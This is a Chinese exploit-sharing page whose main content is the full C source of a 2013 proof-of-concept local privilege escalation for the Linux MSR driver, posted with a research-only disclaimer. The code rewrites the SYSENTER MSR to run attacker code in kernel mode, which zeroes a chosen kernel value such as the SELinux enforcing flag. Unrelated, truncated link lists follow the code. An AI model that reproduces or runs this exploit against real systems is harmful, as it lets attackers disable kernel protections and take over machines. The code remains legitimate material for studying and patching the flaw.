本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. // PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
  2. // can do whatever in the commented area, re-enable module support, etc
  3. // requires CONFIG_X86_MSR and just uid 0
  4. // a small race exists between the time when the MSR is written to the first
  5. // time and when we issue our sysenter
  6. // we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
  7. // configured to take a hex arg of a dword pointer to set to 0
  8. // (modules_disabled, selinux_enforcing, take your pick)
  9. //
  10. // Hello to Red Hat, who has shown yet again to not care until a
  11. // public exploit is released. Not even a bugtraq entry existed in
  12. // their system until this was published -- and they have a paid team
  13. // of how many?
  14. // It's not as if I didn't mention the problem and existence of an easy
  15. // exploit multiple times prior:
  16. // https://twitter.com/grsecurity/status/298977370776432640
  17. // https://twitter.com/grsecurity/status/297365303095078912
  18. // https://twitter.com/grsecurity/status/297189488638181376
  19. // https://twitter.com/grsecurity/status/297030133628416000
  20. // https://twitter.com/grsecurity/status/297029470072745984
  21. // https://twitter.com/grsecurity/status/297028324134359041
  22. //
  23. // spender 2013
  24. #define _GNU_SOURCE
  25. #include<stdio.h>
  26. #include<sched.h>
  27. #include<unistd.h>
  28. #include<sys/types.h>
  29. #include<sys/stat.h>
  30. #include<fcntl.h>
  31. #include<stdlib.h>
  32. #include<sys/time.h>
  33. #include<sys/resource.h>
  34. #include<sys/mman.h>
  35. #define SYSENTER_EIP_MSR 0x176
  36. u_int64_t msr;
  37. unsignedlong ourstack[65536];
  38. u_int64_t payload_data[16];
  39. externvoid*_ring0;
  40. externvoid*_ring0_end;
  41. void ring0(void)
  42. {
  43. __asm volatile(".globl _ring0\n"
  44. "_ring0:\n"
  45. ".intel_syntax noprefix\n"
  46. ".code64\n"
  47. // set up stack pointer with 'ourstack'
  48. "mov esp, ecx\n"
  49. // save registers, contains the original MSR value
  50. "push rax\n"
  51. "push rbx\n"
  52. "push rcx\n"
  53. "push rdx\n"
  54. // play with the kernel here with interrupts disabled!
  55. "mov rcx, qword ptr [rbx+8]\n"
  56. "test rcx, rcx\n"
  57. "jz skip_write\n"
  58. "mov dword ptr [rcx], 0\n"
  59. "skip_write:\n"
  60. // restore MSR value before returning
  61. "mov ecx, 0x176\n"// SYSENTER_EIP_MSR
  62. "mov eax, dword ptr [rbx]\n"
  63. "mov edx, dword ptr [rbx+4]\n"
  64. "wrmsr\n"
  65. "pop rdx\n"
  66. "pop rcx\n"
  67. "pop rbx\n"
  68. "pop rax\n"
  69. "sti\n"
  70. "sysexit\n"
  71. ".code32\n"
  72. ".att_syntax prefix\n"
  73. ".global _ring0_end\n"
  74. "_ring0_end:\n"
  75. );
  76. }
  77. unsignedlong saved_stack;
  78. int main(int argc,char*argv[])
  79. {
  80. cpu_set_tset;
  81. int msr_fd;
  82. int ret;
  83. u_int64_t new_msr;
  84. struct sched_param sched;
  85. u_int64_t resolved_addr =0ULL;
  86. if(argc ==2)
  87. resolved_addr = strtoull(argv[1], NULL,16);
  88. /* can do this without privilege */
  89. mlock(_ring0,(unsignedlong)_ring0_end -(unsignedlong)_ring0);
  90. mlock(&payload_data,sizeof(payload_data));
  91. CPU_ZERO(&set);
  92. CPU_SET(0,&set);
  93. sched.sched_priority =99;
  94. ret = sched_setscheduler(0, SCHED_FIFO,&sched);
  95. if(ret){
  96. fprintf(stderr,"Unable to set priority.\n");
  97. exit(1);
  98. }
  99. ret = sched_setaffinity(0,sizeof(cpu_set_t),&set);
  100. if(ret){
  101. fprintf(stderr,"Unable to set affinity.\n");
  102. exit(1);
  103. }
  104. msr_fd = open("/dev/cpu/0/msr", O_RDWR);
  105. if(msr_fd <0){
  106. msr_fd = open("/dev/msr0", O_RDWR);
  107. if(msr_fd <0){
  108. fprintf(stderr,"Unable to open /dev/cpu/0/msr\n");
  109. exit(1);
  110. }
  111. }
  112. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
  113. ret = read(msr_fd,&msr,sizeof(msr));
  114. if(ret !=sizeof(msr)){
  115. fprintf(stderr,"Unable to read /dev/cpu/0/msr\n");
  116. exit(1);
  117. }
  118. // stuff some addresses in a buffer whose address we
  119. // pass to the "kernel" via register
  120. payload_data[0]= msr;
  121. payload_data[1]= resolved_addr;
  122. printf("Old SYSENTER_EIP_MSR = %016llx\n", msr);
  123. fflush(stdout);
  124. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
  125. new_msr =(u_int64_t)(unsignedlong)&_ring0;
  126. printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr);
  127. fflush(stdout);
  128. ret = write(msr_fd,&new_msr,sizeof(new_msr));
  129. if(ret !=sizeof(new_msr)){
  130. fprintf(stderr,"Unable to modify /dev/cpu/0/msr\n");
  131. exit(1);
  132. }
  133. __asm volatile(
  134. ".intel_syntax noprefix\n"
  135. ".code32\n"
  136. "mov saved_stack, esp\n"
  137. "lea ecx, ourstack\n"
  138. "lea edx, label2\n"
  139. "lea ebx, payload_data\n"
  140. "sysenter\n"
  141. "label2:\n"
  142. "mov esp, saved_stack\n"
  143. ".att_syntax prefix\n"
  144. );
  145. printf("Success.\n");
  146. return0;
  147. }

Linux Kernel 'MSR' Driver Local Privilege Escalation的更多相关文章

  1. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  2. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  3. Linux kernel AACRAID Driver Compat IOCTL 本地安全绕过漏洞

    漏洞名称: Linux kernel AACRAID Driver Compat IOCTL 本地安全绕过漏洞 CNNVD编号: CNNVD-201311-390 发布时间: 2013-11-29 更 ...

  4. [转]Mac OS X local privilege escalation (IOBluetoothFamily)

    Source: http://joystick.artificialstudios.org/2014/10/mac-os-x-local-privilege-escalation.html Nowad ...

  5. Linux Kernel ---- PCI Driver 分析

    自己笔记使用. Kernel 版本 4.15.0 (ubuntu 18.04,intel skylake) 最近想学习VGA驱动去了解 DDCCP / EDID 等协议,然后顺便了解下驱动是如何工作的 ...

  6. [EXP]Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)

    #include "stdafx.h" #include <Windows.h> #include "resource.h" void DropRe ...

  7. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  8. ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)

    ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728) By Perception Point Resear ...

  9. Linux Kernel - Debug Guide (Linux内核调试指南 )

    http://blog.csdn.net/blizmax6/article/details/6747601 linux内核调试指南 一些前言 作者前言 知识从哪里来 为什么撰写本文档 为什么需要汇编级 ...

随机推荐

  1. 删除右键菜单的“用阿里旺旺发送此文件”项

    在运行对话框里的输入框内输入Regedit.exe,点击确定按钮就启动了注册表编辑器程序. 在注册表编辑器窗口左侧展开HKEY_CLASSES_ROOT\CLSID{0DE1378D-F811-40E ...

  2. Java基础知识强化之集合框架笔记43:Set集合之TreeSet存储Integer类型的元素并遍历

    1. TreeSet类概述: • 能够对元素按照某种规则进行排序. • 或者根据创建set时提供的Comparator进行排序 • 具体取决于使用的构造方法 2. 代码示例: package cn.i ...

  3. 17、SQL Server 备份和还原

    SQL Server 备份 恢复模式 SQL Server 数据恢复模式分为三种:完整恢复模式.大容量日志恢复模式.简单恢复模式. 完整恢复模式 默认的恢复模式,它会完整记录下操作数据库的每一个步骤, ...

  4. Unity3D 相机跟随主角移动

    这里给主相机绑定一个脚本. 脚本写为: using UnityEngine; using System.Collections; public class camerafollow : MonoBeh ...

  5. JAVAWEB 生成excel文字在一格显示两位不变成#号

    在用java生成excel的时候会发现这种问题, 如果是人家给的模板还好,如果不是模板,而是通过代码生成的话, 就需要进行处理了, 一个小单元格,如果是一位的话,如1-9显示没有问题,一旦是两位的话, ...

  6. PL/SQL Developer远程连接Oracle数据库

    首先打开电脑,到pl/sql安装的指定目录[D:\app\DZL\product\11.2.0\dbhome_1\NETWORK\ADMIN]找到[tnsnames.ora]     打开[tnsna ...

  7. 一条sql语句循环插入N条不同记录(转)

    SET NOCOUNT ON IF (OBJECT_ID('TB' ) IS NOT NULL ) DROP TABLE TB GO CREATE TABLE TB(ID INT IDENTITY ( ...

  8. AngularJS+NodeJS环境搭建

    需要安装的软件: node-v0.12.7-x64.msi python-2.7.10.amd64.msi Git-2.5.1-64-bit.exe (注意:Git安装时,需要选择的步骤)  安装位置 ...

  9. 关键字throw(something)限制

    C++函数后加关键字throw(something)限制,是对这个函数的异常安全性作出限制.void f() throw() 表示f不允许抛出任何异常,即f是异常安全的.void f() throw( ...

  10. 转载-Linux下svn搭建配置流程

    Linux下svn搭建配置流程     一.    源文件编译安装.源文件共两个,为: 1.   下载subversion源文件 subversion-1.6.1.tar.gz http://d136 ...